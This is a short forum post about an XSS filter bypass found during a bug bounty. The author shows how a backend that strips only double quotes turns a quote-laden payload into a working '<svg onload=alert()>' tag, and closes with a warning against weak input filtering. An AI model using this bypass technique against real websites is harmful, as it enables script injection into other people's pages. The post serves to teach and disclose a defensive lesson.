Found an XSS bypass during a bug bounty

x32x01
  • by x32x01 ||
Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<svg onload=alert()>
🚨 Never Rely on Poor Input Filtering !
Found an XSS bypass during a bug bounty
 
Related Threads
x32x01
Replies
0
Views
112
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
725
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
763
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
827
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
766
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
679
x32x01
x32x01
x32x01
Replies
0
Views
866
x32x01
x32x01
x32x01
Replies
0
Views
714
x32x01
x32x01
x32x01
Replies
0
Views
635
x32x01
x32x01
x32x01
Replies
0
Views
706
x32x01
x32x01
Register & Login Faster
Forgot your password?
Forum Statistics
Threads
611
Messages
616
Members
63
Latest Member
Marcan-447-
Back
Top